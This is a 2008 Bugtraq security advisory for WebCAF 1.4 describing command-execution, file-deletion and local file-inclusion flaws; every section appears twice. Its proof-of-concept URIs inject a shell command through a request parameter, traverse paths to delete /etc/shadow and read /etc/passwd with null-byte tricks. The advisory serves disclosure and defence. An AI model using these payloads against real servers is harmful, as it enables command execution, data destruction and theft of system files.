WebCAF Multiple Input Validation Vulnerabilities
BID:32704
Info
WebCAF Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 32704 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 08 2008 12:00AM |
| Updated: | Dec 11 2008 07:11PM |
| Credit: | dun |
| Vulnerable: |
Tim Rogers WebCAF 1.4 |
| Not Vulnerable: | |
Discussion
WebCAF Multiple Input Validation Vulnerabilities
WebCAF is prone to multiple input-validation vulnerabilities:
- A remote command-execution vulnerability
- An arbitrary-file-deletion vulnerability
- Multiple local file-include vulnerabilities
- Additional unspecified vulnerabilities
An attacker can exploit these issues to execute arbitrary commands in the context of the webserver process, obtain sensitive information, or create denial-of-service conditions.
WebCAF 1.4 is vulnerable; other versions may also be affected.
WebCAF is prone to multiple input-validation vulnerabilities:
- A remote command-execution vulnerability
- An arbitrary-file-deletion vulnerability
- Multiple local file-include vulnerabilities
- Additional unspecified vulnerabilities
An attacker can exploit these issues to execute arbitrary commands in the context of the webserver process, obtain sensitive information, or create denial-of-service conditions.
WebCAF 1.4 is vulnerable; other versions may also be affected.
Exploit / POC
WebCAF Multiple Input Validation Vulnerabilities
Attackers can exploit these issues through a browser.
The following example URIs are available:
For the remote command-execution issue:
http://www.example.com/webcaf/about.php?_WEBCAF[db_database]=asfa%22;id%3E/tmp/aaa.txt;false%20%22
For the arbitrary-file-deletion issue:
http://www.example.com/webcaf/index.php?user_uid=../../../../../../etc/shadow
For the local file-include issues:
http://www.example.com/webcaf/webcaf/?user_uid=1&op=forms&form=../../../../../../../../../../../../etc/passwd%00
http://www.example.com/webcaf/webcaf/?user_uid=1&op=reports&report=../../../../../../../../../../../../etc/passwd
http://www.example.com/webcaf/webcaf/modules/view.php?view=../../../../../../../../../../../etc/passwd%00
Attackers can exploit these issues through a browser.
The following example URIs are available:
For the remote command-execution issue:
http://www.example.com/webcaf/about.php?_WEBCAF[db_database]=asfa%22;id%3E/tmp/aaa.txt;false%20%22
For the arbitrary-file-deletion issue:
http://www.example.com/webcaf/index.php?user_uid=../../../../../../etc/shadow
For the local file-include issues:
http://www.example.com/webcaf/webcaf/?user_uid=1&op=forms&form=../../../../../../../../../../../../etc/passwd%00
http://www.example.com/webcaf/webcaf/?user_uid=1&op=reports&report=../../../../../../../../../../../../etc/passwd
http://www.example.com/webcaf/webcaf/modules/view.php?view=../../../../../../../../../../../etc/passwd%00
Solution / Fix
WebCAF Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].